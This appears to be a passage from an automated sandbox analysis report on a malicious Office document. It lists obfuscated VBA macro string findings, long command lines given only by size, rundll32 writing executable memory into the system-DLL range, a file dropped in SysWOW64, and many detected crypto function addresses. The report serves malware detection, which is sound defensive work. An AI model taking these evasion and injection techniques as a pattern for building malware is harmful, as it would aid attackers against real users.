Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	Name: Hrs2a1p95u19
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	Name: Hrs2a1p95u19

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE

Very long command line found

Source: unknown	Process created: Commandline size = 5709
Source: unknown	Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5613	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Shuwftk\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000976F	7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B41F	7_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212C63	7_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00223895	7_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C0C6	7_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021EE78	7_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021568E	7_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002202C3	7_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002242DA	7_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218736	7_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217B63	7_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00224B41	7_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022340A	7_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022687F	7_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F444	7_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E05A	7_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022A0AF	7_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002160B9	7_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002180BA	7_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002148BD	7_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022889D	7_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002188E5	7_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211CFA	7_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002220C5	7_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00220D33	7_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F536	7_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021153C	7_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00227D03	7_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B112	7_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022511B	7_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00228D1C	7_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00225D1D	7_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002169A0	7_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002261B8	7_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00226DB9	7_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00229586	7_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021F98C	7_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00217998	7_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00216D9F	7_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002231E2	7_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002271EF	7_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00212A30	7_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00214A35	7_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00219A37	7_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00227A0F	7_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00225A61	7_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021EA4C	7_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002162A3	7_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00211280	7_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002212E2	7_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002226F5	7_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002196CD	7_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00228ADC	7_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021BB3A	7_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00220F0C	7_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00222B16	7_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00227F1F	7_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C769	7_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00220B68	7_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00221773	7_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E377	7_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00215B79	7_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218F78	7_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00229B45	7_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00222349	7_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00228F49	7_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00216754	7_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B75F	7_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002117AC	7_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002273AC	7_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022878F	7_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021839D	7_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00223FE7	7_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D7EB	7_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002267E9	7_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002263C1	7_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00221BDF	7_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00219FDC	7_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B41F	8_2_0032B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032EE78	8_2_0032EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00322C63	8_2_00322C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00333895	8_2_00333895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032568E	8_2_0032568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003342DA	8_2_003342DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003302C3	8_2_003302C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C0C6	8_2_0032C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00328736	8_2_00328736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00327B63	8_2_00327B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00334B41	8_2_00334B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003363C1	8_2_003363C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00322A30	8_2_00322A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00329A37	8_2_00329A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00324A35	8_2_00324A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033340A	8_2_0033340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337A0F	8_2_00337A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033687F	8_2_0033687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00335A61	8_2_00335A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032E05A	8_2_0032E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F444	8_2_0032F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032EA4C	8_2_0032EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003280BA	8_2_003280BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003260B9	8_2_003260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003248BD	8_2_003248BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003262A3	8_2_003262A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033A0AF	8_2_0033A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033889D	8_2_0033889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00321280	8_2_00321280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003326F5	8_2_003326F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00321CFA	8_2_00321CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003312E2	8_2_003312E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003288E5	8_2_003288E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338ADC	8_2_00338ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003320C5	8_2_003320C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003296CD	8_2_003296CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330D33	8_2_00330D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F536	8_2_0032F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032BB3A	8_2_0032BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032153C	8_2_0032153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B112	8_2_0032B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00332B16	8_2_00332B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033511B	8_2_0033511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337F1F	8_2_00337F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00335D1D	8_2_00335D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338D1C	8_2_00338D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337D03	8_2_00337D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330F0C	8_2_00330F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00331773	8_2_00331773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032E377	8_2_0032E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00328F78	8_2_00328F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00325B79	8_2_00325B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C769	8_2_0032C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330B68	8_2_00330B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00326754	8_2_00326754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B75F	8_2_0032B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00339B45	8_2_00339B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00332349	8_2_00332349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338F49	8_2_00338F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00336DB9	8_2_00336DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003361B8	8_2_003361B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003269A0	8_2_003269A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003217AC	8_2_003217AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003373AC	8_2_003373AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00327998	8_2_00327998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00326D9F	8_2_00326D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032839D	8_2_0032839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00339586	8_2_00339586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033878F	8_2_0033878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F98C	8_2_0032F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003331E2	8_2_003331E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00333FE7	8_2_00333FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032D7EB	8_2_0032D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003367E9	8_2_003367E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003371EF	8_2_003371EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00331BDF	8_2_00331BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00329FDC	8_2_00329FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FB41F	9_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FEE78	9_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F2C63	9_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F568E	9_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00203895	9_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC0C6	9_2_001FC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002002C3	9_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002042DA	9_2_002042DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F8736	9_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00204B41	9_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F7B63	9_2_001F7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002063C1	9_2_002063C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F9A37	9_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020340A	9_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F4A35	9_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F2A30	9_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00207A0F	9_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00205A61	9_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FE05A	9_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FEA4C	9_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FF444	9_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020687F	9_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020A0AF	9_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F1280	9_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F48BD	9_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F80BA	9_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F60B9	9_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F62A3	9_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020889D	9_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002012E2	9_2_002012E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F96CD	9_2_001F96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002026F5	9_2_002026F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F1CFA	9_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002020C5	9_2_002020C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F88E5	9_2_001F88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00208ADC	9_2_00208ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FB112	9_2_001FB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00200D33	9_2_00200D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F153C	9_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00207D03	9_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FBB3A	9_2_001FBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FF536	9_2_001FF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00200F0C	9_2_00200F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00202B16	9_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020511B	9_2_0020511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00208D1C	9_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00205D1D	9_2_00205D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00207F1F	9_2_00207F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FB75F	9_2_001FB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00200B68	9_2_00200B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F6754	9_2_001F6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00201773	9_2_00201773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00209B45	9_2_00209B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F5B79	9_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F8F78	9_2_001F8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FE377	9_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00202349	9_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00208F49	9_2_00208F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC769	9_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F6D9F	9_2_001F6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F839D	9_2_001F839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F7998	9_2_001F7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002073AC	9_2_002073AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FF98C	9_2_001FF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002061B8	9_2_002061B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00206DB9	9_2_00206DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00209586	9_2_00209586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0020878F	9_2_0020878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F17AC	9_2_001F17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F69A0	9_2_001F69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002031E2	9_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001F9FDC	9_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00203FE7	9_2_00203FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002067E9	9_2_002067E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_002071EF	9_2_002071EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FD7EB	9_2_001FD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00201BDF	9_2_00201BDF
